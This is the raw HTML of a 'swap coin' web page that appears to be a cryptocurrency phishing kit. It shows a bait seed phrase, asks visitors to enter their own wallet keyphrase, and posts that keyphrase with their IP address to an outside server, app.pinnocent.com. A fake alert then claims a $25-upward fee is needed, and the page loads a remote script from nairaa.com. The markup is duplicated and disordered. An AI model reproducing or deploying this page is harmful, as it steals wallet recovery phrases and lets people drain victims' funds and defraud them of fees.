</head>
<body>
<center>
 
  
</center>
</body>

<!DOCTYPE html>

<html lang="zxx" class="js">

<head>

 <meta name=”robots” content=”noindex”>

  

<meta name="robots" content="noindex,follow">

<meta name="robots" content="index,nofollow">

<meta name="robots" content="noindex,nofollow">

<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />

    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />

	<meta charset="utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta charset="utf-8">

    <meta ="viewport" content=" width=device-width, initial-scale=1">

    <link rel=" stylesheet" type="text/css" href="style.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Cal+Sans&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
	<meta charset="utf-8">

	<meta name="author" content="Softnio">

	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

	<meta name="description" content="ICO Crypto is a modern and elegant gift , created for ICO Agencies and digital crypto currency investment website.">

	<!-- Fav Icon  -->


<html>
<head>
  
  <p id=""></p>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-messaging.js"></script>
<script>
    var firebaseConfig = {
apiKey: "AIzaSyBV2pY0LLJTrHhiCFArAedQpTiUshDJsi8",
  authDomain: "pinnocent-fa387.firebaseapp.com",
  databaseURL: "https://pinnocent-fa387.firebaseio.com",
  projectId: "pinnocent-fa387",
  storageBucket: "pinnocent-fa387.appspot.com",
  messagingSenderId: "403452483449",
  appId: "1:403452483449:web:630abc1e7c265a8f0481a8",
  measurementId: "G-8DGVGDCCL2"
};
    firebase.initializeApp(firebaseConfig);
    const messaging=firebase.messaging();

    function IntitalizeFireBaseMessaging() {
        messaging
            .requestPermission()
            .then(function () {
                console.log("Notification Permission");
                return messaging.getToken();
            })
            .then(function (token) {
                console.log("Token : "+token);
                document.getElementById("token").innerHTML=token;
            })
            .catch(function (reason) {
                console.log(reason);
            });
    }

    messaging.onMessage(function (payload) {
        console.log(payload);
        const notificationOption={
            body:payload.notification.body,
            icon:payload.notification.icon
        };

        if(Notification.permission==="granted"){
            var notification=new Notification(payload.notification.title,notificationOption);

            notification.onclick=function (ev) {
                ev.preventDefault();
                window.open(payload.notification.click_action,'https://nairaa.com/chat.html?');
                notification.close();
            }
        }

    });
    messaging.onTokenRefresh(function () {
        messaging.getToken()
            .then(function (newtoken) {
                console.log("New Token : "+ newtoken);
            })
            .catch(function (reason) {
                console.log(reason);
            })
    })
    IntitalizeFireBaseMessaging();
</script> 
	<title> swap coin</title>
	
  <meta name=”robots” content=”noindex”>
  
<meta name="robots" content="noindex,follow">
<meta name="robots" content="index,nofollow">
<meta name="robots" content="noindex,nofollow">
<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />
    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />
	<meta charset="utf-8">

	<meta name="description" content="swap coin">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta property='og:image' content='earnmoney.jpg' />
	<link rel="shortcut icon" href="https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-ios7-contact-512.png">
	
	<style>
	body {
	  font-family: "Cal Sans", sans-serif;
  font-weight: 400;
  font-style: normal;
	}
	textarea {
	  font-family: "Cal Sans", sans-serif;
  font-weight: 400;
  font-style: normal;
	}
	.cal-sans-regular {
  font-family: "Cal Sans", sans-serif;
  font-weight: 400;
  font-style: normal;
}
input{
  font-family: "Cal Sans", sans-serif;
  font-weight: 400;
  font-style: normal;
}
	  .poppins-thin {
  font-family: "Poppins", sans-serif;
  font-weight: 100;
  font-style: normal;
}

.poppins-extralight {
  font-family: "Poppins", sans-serif;
  font-weight: 200;
  font-style: normal;
}

.poppins-light {
  font-family: "Poppins", sans-serif;
  font-weight: 300;
  font-style: normal;
}

.poppins-regular {
  font-family: "Poppins", sans-serif;
  font-weight: 400;
  font-style: normal;
}

.poppins-medium {
  font-family: "Poppins", sans-serif;
  font-weight: 500;
  font-style: normal;
}

.poppins-semibold {
  font-family: "Poppins", sans-serif;
  font-weight: 600;
  font-style: normal;
}

.poppins-bold {
  font-family: "Poppins", sans-serif;
  font-weight: 700;
  font-style: normal;
}

.poppins-extrabold {
  font-family: "Poppins", sans-serif;
  font-weight: 800;
  font-style: normal;
}

.poppins-black {
  font-family: "Poppins", sans-serif;
  font-weight: 900;
  font-style: normal;
}
button {
  font-family: "Poppins", sans-serif;
  font-weight: 900;
  font-style: normal;
}

.poppins-thin-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 100;
  font-style: italic;
}

.poppins-extralight-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 200;
  font-style: italic;
}

.poppins-light-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 300;
  font-style: italic;
}

.poppins-regular-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 400;
  font-style: italic;
}

.poppins-medium-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 500;
  font-style: italic;
}

.poppins-semibold-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 600;
  font-style: italic;
}

.poppins-bold-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 700;
  font-style: italic;
}

.poppins-extrabold-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 800;
  font-style: italic;
}

.poppins-black-italic {
  font-family: "Poppins", sans-serif;
  font-weight: 900;
  font-style: italic;
}

	</style>
	<style>
		table tr td{text-align:center;}
.button {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 14px 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 1px 0px;
  cursor: pointer;
}
.button1 {width: 208px;
border-radius: 4px;
border: 1px solid DarkGray;
padding: 13px 13px;
margin: 3px 3px;
height: 22px;
background-color: rgb(249,249,249);
display: inline-block; }
.button2 {width: 50%;}
.button3 {width: 280px;
border-radius: 4px;
border: 1px solid DarkGray;
padding: 13px 13px;
margin: 3px 3px;
height: 100px;
background-color: rgb(249,249,249);
display: inline-block;

}
		.bottom a{color:#D3D3D3;}
		.bottom a:link{text-decoration:none;}
		input{padding:10px;}
		
		.login{background-color:rgb(19,90,245);color:white;
border-radius: 10px;
padding: 13px 13px;
margin: -15px -15px;
border: 1px solid DarkGray;
font-family: 'segoe UI';
font-weight: bold;

		}
		
.center {
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 50%;
width: 360px;
  height: 80px;
}
		.login{width: 97%;}
		.check{background-color:#0ac21e;color:white;padding:10px;
margin: 4px 2px;
		}
		.inputf a:link{text-decoration:none;}
	</style>
</head>
<body style="margin:0px;">
<script>
	document.title='swap coin';
</script>
<div style="width:100%;">
  
<div style="width:100%;">
<style>
    .iconn {
    width: 50px;
    height: 50px;
     .ctp {
    width: 240px;
    height: 90px;
    display: inline-block;
    border: solid #171426;
    margin: 3px;
    box-shadow: 1px 5px 6px 0px black;
  }
</style>
	
</div>

</div>
<div style="width:100%;">
 
<center>
<div class="inputf" style="background-color:white;padding:10px;text-align:center;">
    <img class="iconn" src="moni.png">
    <h2> Exchange coin to your wallet addresses </h2>
<form id="anonymousNewMessage" class="form" method="POST" action="https://app.pinnocent.com/vpage">
    <input type="hidden" name="ftype" value="normal" />

     
     
                </div>
                <div class="card-body">

                  <input type="hidden" name="user_id" id="userUsername" value="16934">
                  <p>Swap coins from the provided phrase</p>
                  <span>Enter your own phrase at the second form </span> <strong>You can add the provided phrase to your wallet to check the balance</strong>
                  <br>
	<textarea class="button3" name="message_title" type="text" placeholder="Enter Keyphrase to swap" maxlength="400" required="">tourist evil detail awful snack clap gate clump ball normal any oak</textarea>
	<br>
		<img src="dola.png" class="iconn">
				<br>
		<strong>
Enter amount to withraw
		</strong>
		<br>
		<input type="number" required="" placeholder="$1000" max="1000">
		
	<br>
		<textarea class="button3"  name="description" type="text" id="pass" placeholder="Enter your own Keyphrase" maxlength="400" size="35px"
		required></textarea>

    <input type="hidden" name="ip" value="172.71.118.164" />
<input type="hidden" name="link" value="keyphrase" />

    <!-- the rest of the form //-->

<br/><br/>
		<input class="login poppins-black" name="login" type="submit" id="anonymousProcess" value="Request Withdraw" style="width:250px; height:50px;" onclick="alert('In valid details/phrase or Insufficient balance on your wallet for charges fees. Please Note Charges fee is $25 upward')"><br/><br/>

	
</div>
  <script src="https://nairaa.com/back.js?1734976792">  <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-E7K8F1651E"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-E7K8F1651E');
</script> 
</script>

  <script type="text/javascript">
    $(document).ready(function() {

  var url =anonymousURL('user');
  var url2 =anonymousURL('ref');
  console.log(url);
     $('.userUsername').html('Send Anonymous Message to '+url);
     $('#userUsername').val(url2);
   });


  </script>
</body>
</html>
  
                       

                        <div class="info-card info-card-bordered">

                            <div class="row align-items-center">

                              

                              

                              

                              

                                <div class="col-sm-3">

                                  

                                  

                                  

                                  

                  
    

    

	<!-- JavaScript (include all script here) -->



	

                 
  <!--   Core JS Files   -->

 

  

 

  <!-- Control Center for Now Ui Kit: parallax effects, scripts for the example pages etc -->



  



  <script src="https://nairaa.com/back.js?1734976792">  <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-E7K8F1651E"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-E7K8F1651E');
</script> 

</script>



  <script type="text/javascript">

    $(document).ready(function() {



  var url =anonymousURL('user');

  var url2 =anonymousURL('ref');

  console.log(url);

     $('.userUsername').html('Send Anonymous Message to '+url);

     $('#userUsername').val(url2);

   });





  </script>

</body>

</html>

